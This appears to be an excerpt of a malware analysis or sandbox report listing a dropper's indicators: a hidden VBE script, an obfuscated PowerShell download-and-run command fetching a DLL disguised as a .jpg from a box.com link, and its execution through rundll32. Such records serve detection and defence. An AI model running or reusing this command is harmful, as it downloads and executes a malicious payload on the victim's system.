Technical Information
- https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg as %temp%\ghfauclmz_user_mrfri.dll
- %TEMP%\ixp000.tmp\h.vbe
- 'ir###.box.com':443
- DNS ASK ir###.box.com
- '%WINDIR%\syswow64\wscript.exe' H.vbe' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object sYstem.Net.webclieNt).dOwNlOadfile('""https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg','%TEMP%\ghfauclmz_user_mrfri.dll');start-PrOcess ruNdll32.exe %TEMP%\...' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' H.vbe
- '%WINDIR%\syswow64\rundll32.exe' %TEMP%\ghfauclmz_user_mrfri.dll starter